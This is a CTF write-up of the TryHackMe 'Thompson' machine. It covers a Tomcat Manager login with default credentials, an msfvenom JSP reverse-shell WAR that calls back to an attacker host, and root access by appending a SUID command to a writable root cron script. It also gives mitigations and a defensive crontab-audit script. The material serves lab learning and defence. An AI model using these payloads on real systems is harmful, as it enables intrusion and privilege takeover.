Thompson Write-Up

Fahri Korkmaz
3 min read · Mar 21, 2021

Description

Thompson is a boot2root CTF on TryHackMe rated "Easy". Initial access is obtained by uploading a reverse shell through the Tomcat Manager application, and privilege escalation to root is done through a misconfigured cronjob.

Enumeration

An Nmap scan shows that ports 22, 8009 and 8080 are open. Port 8009 is the Tomcat AJP connector, and port 8080 serves Tomcat 8.5.5 over HTTP.

nmap -sC -sV -O -oN nmap/scripts 10.10.39.116

The landing page of the Tomcat server shows us the default Tomcat page.

We can log into the Manager application (/manager/html) with the default credentials.

A user with the manager-gui role can deploy WAR files, which is all we need to upload a reverse shell.

Initial access

The reverse shell was created with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your tun0 IP> LPORT=4444 -f war > shell.war

Now we can upload shell.war through the Manager's WAR upload form. After deployment, the application is listed under the path /shell.

Before navigating to /shell we have to start a listener. For this purpose I will use pwncat.

pc -lp 4444

Next we navigate to "http://10.10.39.116:8080/shell/". The JSP executes on the server and we get a shell on the box as the tomcat user.

We can now navigate to /home/jack and get the user flag.

Privilege Escalation

Inside Jack's home folder there are two interesting files. The first one is "id.sh", a bash script that runs the id command and writes the output into "test.txt". The second one is "test.txt" itself: its contents show uid=0(root), so the script has been run by root.

Based on this information we can assume that a cronjob runs the script as root. To validate the assumption we can read /etc/crontab, and indeed "id.sh" is run as root from a cronjob.

The tomcat user also has write access to "id.sh". Anything we append to the file will therefore be executed as root on the next cron run, which gives us a root shell. I will add the SUID bit to /bin/bash.

echo 'chmod +s /bin/bash' >> id.sh

After waiting a minute for the cronjob to run, /bin/bash should have the SUID bit set (it shows up as rwsr-sr-x in ls -l).

Finally we can spawn a root shell and read the root flag. The -p flag is required: without it bash drops the effective uid back to the real uid and the SUID bit is useless.

/bin/bash -p

Mitigation

Default passwords should be changed as soon as possible, and the Manager application should not be reachable by untrusted users at all. Furthermore, Tomcat 8.5.5 is a very old version and should be updated. Finally, scripts run by a root cronjob should be owned by root and writable only by root; a root-owned cron script should not live in a user's home directory where the user, or anyone who compromises a service account, can edit it.
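The privilege-escalation step above comes down to one question: does a root cronjob execute a file that a low-privileged user can modify or replace? The script below is an added example (not part of the original write-up) that answers it for a system crontab in the /etc/crontab format. It is the check you would run both as the attacker after landing the tomcat shell and as the defender verifying the mitigation. It assumes ls -ld output in the usual Unix layout (permission string first, owner in the third column); the crontab and scripts it is run against in the usage example are constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example: audit a system crontab for root jobs whose target script can be
# written or replaced by an unprivileged user. Not from the original write-up.
# Assumes "ls -ld" prints the permission string first and the owner third.

# Permission string (e.g. -rwxrwxrwx) and owner of a path, taken from ls -ld.
# substr(...,1,10) drops ACL/SELinux markers such as a trailing "+" or ".".
perm_of()  { ls -ld -- "$1" | awk '{ print substr($1, 1, 10) }'; }
owner_of() { ls -ld -- "$1" | awk '{ print $3 }'; }

# Print "user<TAB>command" for each job in a system crontab (/etc/crontab or
# /etc/cron.d/*). Handles five-field schedules and @reboot/@daily shortcuts,
# and skips comments, blank lines and VAR=value assignments.
crontab_jobs() {
  grep -Ev '^[[:space:]]*(#|$)' "$1" |
  grep -Ev '^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' |
  awk '{
    n = ($1 ~ /^@/) ? 2 : 6                       # column holding the user
    cmd = ""
    for (i = n + 1; i <= NF; i++) cmd = cmd (i > n + 1 ? " " : "") $i
    print $n "\t" cmd
  }'
}

# Reduce a cron command to the script it runs: drop a leading interpreter
# ("bash /home/jack/id.sh" -> "/home/jack/id.sh") and anything after the path.
script_of() {
  ( set -f; set -- $1                              # split on words, no globbing
    case "$(basename -- "${1:-}")" in
      sh|bash|dash|zsh|python|python2|python3|perl) shift ;;
    esac
    printf '%s\n' "${1:-}" )
}

# For every job run as root, report why its script is attacker-editable.
# Output lines are "root<TAB>/path/to/script<TAB>reason", where reason is:
#   world-writable / group-writable : the script itself can be appended to
#   dir-writable                    : the directory allows deleting/replacing it
#   owner:<user>                    : the script is not owned by root
audit_crontab() {
  crontab_jobs "$1" | while IFS="$(printf '\t')" read -r user cmd; do
    [ "$user" = root ] || continue
    script=$(script_of "$cmd")
    [ -f "$script" ] || continue
    perm=$(perm_of "$script")
    dperm=$(perm_of "$(dirname -- "$script")")
    if [ "$(printf '%s' "$perm" | cut -c9)" = w ]; then
      printf 'root\t%s\tworld-writable\n' "$script"
    fi
    if [ "$(printf '%s' "$perm" | cut -c6)" = w ]; then
      printf 'root\t%s\tgroup-writable\n' "$script"
    fi
    # Other-writable directory without the sticky bit: even a root-only file
    # can be unlinked and replaced with an attacker-controlled one.
    case "$dperm" in
      ????????w[!tT]) printf 'root\t%s\tdir-writable\n' "$script" ;;
    esac
    if [ "$(owner_of "$script")" != root ]; then
      printf 'root\t%s\towner:%s\n' "$script" "$(owner_of "$script")"
    fi
  done
}

# Usage: bash audit_cron.sh /etc/crontab   (or source the file and call the
# functions directly). With no argument nothing is audited.
if [ $# -ge 1 ]; then
  audit_crontab "$1"
fi
```

On the Thompson box, running audit_crontab against /etc/crontab from the tomcat shell would list /home/jack/id.sh with a writable reason, which is exactly the misconfiguration the write-up exploits; after the mitigation (root ownership, mode 700 or 755, not in a user-writable directory) the same run prints nothing. Cron also reads /etc/cron.d/* and per-user crontabs under /var/spool/cron, which use a different field layout and are not covered by this parser.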
